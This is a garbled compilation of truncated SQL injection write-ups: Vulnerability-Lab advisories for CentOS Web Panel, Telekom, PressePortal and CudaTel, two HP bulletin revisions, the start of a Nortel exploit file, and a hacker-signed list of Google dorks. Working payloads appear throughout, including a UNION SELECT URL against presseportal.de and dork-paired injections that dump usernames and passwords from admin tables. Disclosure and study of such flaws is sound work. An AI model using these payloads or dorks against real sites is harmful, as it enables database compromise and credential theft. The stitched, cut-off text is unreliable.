CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities
Document Title:
CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1833

Release Date: 2018-01-22
Vulnerability Laboratory ID (VL-ID): 1833
Common Vulnerability Scoring System: 7.5
Vulnerability Class: SQL Injection
Current Estimated Price: 4.000€ - 5.000€

Product & Service Introduction:
CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without the need to use ssh console for every little thing. There are lots of options and features for server management in this control panel. CWP automatically installs full LAMP on your server (apache, php, phpmyadmin, webmail, mailserver…).
(Copy of the Homepage: http://centos-webpanel.com/features )

Abstract Advisory Information:
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the CentOS Web Panel v0.9.8.12.

Vulnerability Disclosure Timeline:
2018-01-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status: Published

Affected Product(s):
CWP
Product: CentOS Web Panel - (CWP) 0.9.8.12

Exploitation Technique: Remote
Severity Level: High

Technical Details & Description:
A remote sql-injection web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12 web-application. The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms.

The sql-injection vulnerability is located in the `row_id` and `domain` value of the `Add a domain` module POST method request. Remote attackers are able to manipulate the POST method request to execute own malicious sql commands on the application-side of the web-application. The request method to inject is POST and the attack vector is application-side. The vulnerability can be exploited by restricted user accounts against the web-application administrator.

The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.5. Exploitation of the remote sql injection vulnerability requires no user interaction and only a low privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add a domain

Vulnerable Parameter(s):
[+] row_id
[+] domain

Affected Module(s):
[+] Delete domain

Proof of Concept (PoC):
The remote sql-injection vulnerability can be exploited by remote attackers with low privilege user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Add a domain
2. Delete the same domain
3. Intercept the http request with a session tamper
4. Manipulate in the POST method request the values `row_id` or `domain` with '
5. Continue the request and an exploitable sql-exception becomes visible
6. Now the attacker can inject to the row_id and domain to execute malicious sql commands via restricted user account
7. Successful reproduce of the sql-injection vulnerability!

--- SQL Error Exceptions ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test-domain'' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /usr/local/cwpsrv/htdocs/resources/admin/include/functions.php(1) : eval()'d code(1) : eval()'d code on line 5

--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://cwp.localhost:2030/index.php?module=list_domains Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[185.4.149.65:2030]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://cwp.localhost:2030/index.php?module=list_domains]
Cookie[cwpsrv-b66ec0f9742b8f4bd3407e0151cd756c=ae0c56ru1ver0k3d0cd1hh4147]
Connection[keep-alive]
POST-Daten:
ifpost[yes]
username[test-dom]
domain[SQL-INJECTION PAYLOAD!]
row_id[SQL-INJECTION PAYLOAD!]
Response Header:
Date
German Telekom Bug Bounty #11 - Remote SQL Injection Vulnerability
Document Title:
German Telekom Bug Bounty #11 - SQL Injection Vulnerability

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1177
Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/
Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml

Release Date: 2014-02-06
Vulnerability Laboratory ID (VL-ID): 1177
Common Vulnerability Scoring System: 8.3

Product & Service Introduction:
Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW.
(Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom http://www.telekom.com/bug-bounty )

Abstract Advisory Information:
The Vulnerability Laboratory Research Team discovered a remote SQL Injection web vulnerability in the official Telekom website web-application.

Vulnerability Disclosure Timeline:
2013-12-30: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-12-30: Vendor Notification (Telekom CERT Security Team)
2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team)
2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€)
2014-02-06: Public Disclosure (Vulnerability Laboratory)

Discovery Status: Published
Exploitation Technique: Remote
Severity Level: Critical

Technical Details & Description:
A remote SQL Injection web vulnerability has been discovered in the official Telekom (English) Fitness Check website web application. The vulnerability allows remote attackers to inject unauthorized own sql statements to compromise the affected web-application or dbms.

The sql injection vulnerability is located in `englishtest2004/test.asp` file of the englishtest2004 module (path). After executing the query through the test.asp page, the query's result can be seen from a `500 error` returned by the `test.asp` page. The connected vulnerable parameter in the `test.aspx` file is `mailbody` that is passed through the POST method request. The SQL injection bug is in the INSERT statement. Other parameters like VORNAME, Email, PLZ, TELEFON can be accessed by usage of a malicious insert statement.

The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.3(+). Exploitation of the remote sql injection web vulnerability requires NO user interaction or a privileged web-application user account. Successful exploitation of the remote pre-auth sql injection results in dbms, web-server and web-application (context) compromise.

Vulnerable Module(s):
[+] /englishtest2004/

Vulnerable File(s):
[+] /englishtest2004/test.asp

Vulnerable Parameter(s):
[+] mailbody

Proof of Concept (PoC):
The SQL injection vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ...

a) The attacker should visit the main page to take the test https://gt.telekom.de/englishtest2004eng/html/intro.htm
b) The attacker should keep clicking on next until he reaches the final step in the test which is the page of Registration for the Fitness Check
c) In the form of registering the test, we have many fields. We fill up the vulnerable fields and then click on Register button
d) The attacker then should intercept the request and edit the mailbody parameter to an apostrophe that will generate the SQL error
e) After forwarding the request, we will find the SQL error in the INSERT statement echoed back in the page

The post request that has been used to reproduce the image is:

POST /englishtest2004/test.asp HTTP/1.1
Host: gt.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm
Cookie: _ga=GA1.2.1524944686.1388633141; ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content
NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability
Document Title:
NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability

References (Source):
http://vulnerability-lab.com/get_content.php?id=1150
Lab News Article: http://www.vulnerability-lab.com/news/get_news.php?id=115

Release Date: 2013-11-28
Vulnerability Laboratory ID (VL-ID): 1150
Common Vulnerability Scoring System: 8.7

Abstract Advisory Information:
The Vulnerability Laboratory Research Team discovered a critical SQL Injection web vulnerability in the official News-Aktuell - PressePortal website web-application.

Vulnerability Disclosure Timeline:
2013-04-26: Researcher Notification & Coordination (Marco Onorati)
2013-05-01: Vendor Notification (PressePortal Team)
2013-11-28: Vendor Response/Feedback (PressePortal Team)
2013-11-28: Vendor Fix/Patch (PressePortal Developer Team)
2013-11-29: Public Disclosure (Vulnerability Laboratory)

Discovery Status: Published
Exploitation Technique: Remote
Severity Level: Critical

Technical Details & Description:
A remote sql injection web vulnerability has been discovered in the official News-Aktuell - PressePortal website web-application. The vulnerability allows remote attackers to execute own sql commands by usage of a vulnerable application value GET method request.

The vulnerability is located in the `../services/content` module with the vulnerable iframe.htx file. Remote attackers are able to inject own sql commands by usage of the vulnerable `id` parameter. After the inject the website returns with an obviously blank page but when you watch the source the execute is in the listed rss and context values. The issue is a classic remote sql injection.

The security risk of the remote sql injection web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.7(+). Exploitation of the sql injection web vulnerability requires no privileged web application user account and also no user interaction. Successful exploitation of the vulnerability results in web application (website), account system dbms compromise.

Vulnerable Module(s):
[+] services/content

Vulnerable File(s):
[+] iframe.htx

Vulnerable Parameter(s):
[+] id

Affected Domain(s):
[+] http://www.presseportal.de

Proof of Concept (PoC):
The remote sql injection web vulnerability can be exploited by remote attackers without user interaction and also without privileged web application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

PoC: Remote SQL Injection
http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20inc=true

--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.presseportal.de/services/content/iframe.htx ?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20inc=true Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[3145] Mime Type[text/html]
Request Headers:
Host[www.presseportal.de]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1; PressePortalDeDst=portal6-pp.de; __utma=239002817.282394538.1385649109.1385649109.1385649109.1; __utmb=239002817.4.10.1385649109; __utmc=239002817; __utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=2%7C48; POPUPCHECK=1385735515782]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Date[Thu, 28 Nov 2013 14:52:27 GMT]
Server[Apache]
X-Powered-By[PHP/5.3.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[3145]
Connection[Keep-alive]
Via[1.1 AN-0003011040777600]

Reference(s):
http://www.presseportal.de/services/content/iframe.htx?id
https://www.presseportal.de/services/content/iframe.htx?id

Picture(s
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability
Title:
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability

Date: 2013-07-20

References:
http://vulnerability-lab.com/get_content.php?id=775
BARRACUDA NETWORK SECURITY ID: BNSEC-723

VL-ID: 775
Common Vulnerability Scoring System: 8.6

Introduction:
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks.

Powerful, Complete Solution
With an expansive feature set and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers.
(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )

Abstract:
1.1 The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.
1.2 The Vulnerability Laboratory Research Team discovered a client side vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

Report-Timeline:
2012-11-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2013-03-01: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow]
2013-07-20: Public Disclosure (Vulnerability Laboratory)

Status: Published

Affected Products:
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040

Exploitation-Technique: Remote
Severity: Critical

Details:
1.1
A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The vulnerability allows remote attackers or local low privilege application user accounts to inject (execute) own SQL commands to the affected application dbms.

The blind sql injection vulnerability is located in the cdr module when processing to request manipulated row page parameters as searchstring. A remote attacker can for example delete the standard value context of the module request to inject (execute) own sql commands.

Exploitation of the vulnerability requires a low privilege web application user account and no user interaction. Successful exploitation of the vulnerability results in database management system and web application compromise.

Vulnerable Section(s):
[+] search - listing

Vulnerable Module(s):
[+] cdr - seachstring listing

Vulnerable Parameter(s):
[+] row
[+] page

1.2
A client side input validation vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The non-persistent vulnerability allows remote attackers to manipulate client side application requests to browser.

The second vulnerability (client side) is located in the invalid value exception handling. Remote attackers can provoke the exception-handling by including invalid script code inputs to redisplay the malicious context when processing to load the output. To provoke the exception-handling the remote attacker can use the vulnerable row parameter of the cdr searchstring listing to execute own malicious (client-side) script code.

Exploitation of the vulnerability requires no web application user account but medium or high user interaction. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or malicious websites. Exploitation requires medium user interaction.

Vulnerable Section(s):
[+] search - listing

Vulnerable Module(s):
[+] cdr - seachstring listing

Vulnerable Parameter(s):
[+] row

Affected Module(s):
[+] Exception-Handling (invalid value)

Proof of Concept:
1.1
The sql injection vulnerability can be exploited by remote attackers with low privilege web application user account and without user
[security bulletin] HPSBMU02775 SSRT100853 rev.2 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevat
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03312417
Version: 2

HPSBMU02775 SSRT100853 rev.2 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevation

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2012-05-07
Last Updated: 2012-05-09

Potential Security Impact: Remote SQL injection, cross site scripting (XSS), privilege elevation

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Performance Insight for Networks running on HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be exploited remotely resulting in SQL injection, cross site scripting (XSS), and privilege elevation.

References: CVE-2012-2007 (SQL injection), CVE-2012-2008 (XSS), CVE-2012-2009 (privilege elevation)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows v5.3.x , v5.41, v5.41.001, v5.41.002

BACKGROUND

CVSS 2.0 Base Metrics
Reference       Base Vector                     Base Score
CVE-2012-2007   (AV:N/AC:L/Au:N/C:P/I:P/A:P)    7.5
CVE-2012-2008   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
CVE-2012-2009   (AV:N/AC:M/Au:S/C:C/I:P/A:N)    7.0

Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has made a hotfix available to resolve the vulnerabilities. The hotfix requires HP Performance Insight for Networks v5.41.002 (Patch 2). The hotfix is available from the normal HP Services support channel. Customers should open a support case to request 5.41.002 piweb HF09.

MANUAL ACTIONS: Yes - NonUpdate
Apply the 5.41.002 piweb HF09 hotfix if HP Performance Insight for Networks is installed.

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS
HP-UX B.11.31
HP-UX B.11.23
HP-UX B.11.11
action: apply 5.41.002 piweb HF09 or subsequent
END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 7 May 2012 Initial release
Version:2 (rev.2) - 9 May 2012 Corrected CVE numbers in Background section (2011-2012)

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard
[security bulletin] HPSBMU02775 SSRT100853 rev.1 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevat
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03312417
Version: 1

HPSBMU02775 SSRT100853 rev.1 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevation

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2012-05-07
Last Updated: 2012-05-07

Potential Security Impact: Remote SQL injection, cross site scripting (XSS), privilege elevation

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Performance Insight for Networks running on HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be exploited remotely resulting in SQL injection, cross site scripting (XSS), and privilege elevation.

References: CVE-2012-2007 (SQL injection), CVE-2012-2008 (XSS), CVE-2012-2009 (privilege elevation)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows v5.3.x , v5.41, v5.41.001, v5.41.002

BACKGROUND

CVSS 2.0 Base Metrics
Reference       Base Vector                     Base Score
CVE-2011-2007   (AV:N/AC:L/Au:N/C:P/I:P/A:P)    7.5
CVE-2011-2008   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
CVE-2011-2009   (AV:N/AC:M/Au:S/C:C/I:P/A:N)    7.0

Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has made a hotfix available to resolve the vulnerabilities. The hotfix requires HP Performance Insight for Networks v5.41.002 (Patch 2). The hotfix is available by contact the normal HP Services channel and requesting 5.41.002 piweb HF09.

MANUAL ACTIONS: Yes - NonUpdate
Apply the 5.41.002 piweb HF09 hotfix if HP Performance Insight for Networks is installed.

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS
HP-UX B.11.31
HP-UX B.11.23
HP-UX B.11.11
action: apply apply 5.41.002 piweb HF09 or subsequent
END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 7 May 2012 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
<?php
/*
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration Web Service getSubKeys() Remote SQL Injection Exploit

tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft SQL Server 2005 Express

download uri: ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso

background:

This software installs a Tomcat http server which listens on port 8080 for incoming connections. It exposes the following servlet as declared inside
c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml :

..
<servlet-mapping>
    <servlet-name>EyrAPIConfiguration</servlet-name>
    <url-pattern>/EyrAPIConfiguration/*</url-pattern>
</servlet-mapping>
..

at the following url:

http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf

Vulnerability:

without prior authentication, you can reach a web service with various methods available, as described inside the associated wsdl, see file:

c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl

among them, the getSubKeys() method.

Now look at getSubKeys() inside the decompiled
c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class :

..
    public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String systemId, String componentId, String sysCompId, String userName)
        throws RemoteException
    {
        StringBuffer xml;
        ConfigOwnerId configOwnerId;
        Connection conn;
        PreparedStatement pStmt;
        ResultSet rs;
        PreparedStatement pStmt2;
        ResultSet rs2;
        log.info((new StringBuilder()).append("Request getSubKeys: iterateSubKeys=").append(iterateSubKeys).append(", includeValues=").append(includeValues).append(", SystemId=").append(systemId).append(", componentId=").append(componentId).append(", sysCompId=").append(sysCompId).append(", userName=").append(userName).toString());
        xml = new StringBuffer("ConfigurationNodeList");
        configOwnerId = null;
        conn = null;
        pStmt = null;
        rs = null;
        pStmt2 = null;
        rs2 = null;
        try
        {
            conn = SiteDatabase.getInstance().getConnection();
            if(EyrAPIProperties.getInstance().getProperty("database", "MSSQLServer").equalsIgnoreCase("Oracle"))
            {
                if(componentId.compareToIgnoreCase("") == 0)
                    componentId = "*";
                if(systemId.compareToIgnoreCase("") == 0)
                    systemId = "*";
                if(sysCompId.compareToIgnoreCase("") == 0)
                    sysCompId = "*";
                if(userName.compareToIgnoreCase("") == 0)
                    userName = "*";
                pStmt = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE nvl(ComponentID, '*') = '").append(componentId).append("' AND ").append("nvl(SystemID, '*') = '").append(systemId).append("' AND ").append("nvl(SysCompID, '*') = '").append(sysCompId).append("' AND ").append("nvl(UserName, '*') = '").append(userName).append("'").toString());
                rs = pStmt.executeQuery();
            } else
            {
                pStmt = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE ISNULL(CONVERT(varchar(36), ComponentID), '') = '").append(unpunctuate(componentId)).append("' AND ").append("ISNULL(CONVERT(varchar(36), SystemID), '') = '").append(unpunctuate(systemId)).append("' AND ").append("ISNULL(CONVERT(varchar(36), SysCompID), '') = '").append(unpunctuate(sysCompId)).append("' AND ").append("ISNULL(UserName, '') = '").append(unpunctuate(userName)).append("'").toString());
                rs = pStmt.executeQuery();
            }
            if(rs.next())
            {
                String strConfigOwnerId = rs.getString(1);
                if(!rs.wasNull())
                    configOwnerId = new ConfigOwnerId(strConfigOwnerId);
                pStmt2 = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigGroupID, ConfigGroupName FROM ConfigGroupView WHERE ConfigOwnerID = '").append(configOwnerId.toString()).append("'").toString());
                for(rs2 = pStmt2.executeQuery(); rs2.next(); xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys, includeValues)));
            }
        }
        catch(SQLException e)
        {
            String msg = "Unable to get subkeys";
            log.error(msg, e);
            throw new RemoteException(msg, e);
        }
        catch(GenericDatabaseException e)
        {
            String msg = "Unable to get subkeys";
            log.error(msg, e);
            throw new RemoteException(msg, e);
        }
        DbHelper.closeStatement(log, pStmt);
        DbHelper.closeResultSet(log, rs);
        DbHelper.closeStatement(log, pStmt2);
        DbHelper.closeResultSet(log, rs2
Loop (ricetta.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.loopmm.com/
Persian Gulf 4 Ever!
Dork : Loop - creazioni multimediali inurl:ricetta.php?id=
Exploite: www.victim.com/ricetta.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Manifattura Web (prodotto.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.manifatturaweb.it/
Dork : Manifattura Web inurl:prodotto.php?id=
Exploite: www.victim.com/prodotto.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Editel (news-dettaglio.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.editeltn.it/
Dork : Realizzazione sito: Editel inurl:news-dettaglio.php?id=
Exploite: www.victim.com/news-dettaglio.php?id=+28+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users
OR: www.victim.com/news-dettaglio.php?id=+9+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9+from+utenti--
SpeCial TanX To : Skote_Vahshat

BvCom (dettaglio.php?idnews) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.bvcom.it/
Dork : Powered by: bvcom.it inurl:dettaglio.php?idnews=
Exploite: www.victim.com/news/dettaglio.php?idnews=-9+union+select+1,2,user(),4,version(),6,7,8--
SpeCial TanX To : Skote_Vahshat

WSTAFF Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.wstaff.it/
Dork : Powered by: WSTAFF srl
Exploite: www.victim.com/prodotti.php?codice=-5 union select 1,2,3,user,password from admin
www.victim.com/ricetta.php?id=-9/**/union/**/select/**/9,user,9,9,password,9,9/**/from/**/admin
SpeCial TanX To : Skote_Vahshat

MaiNick (ricetta.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
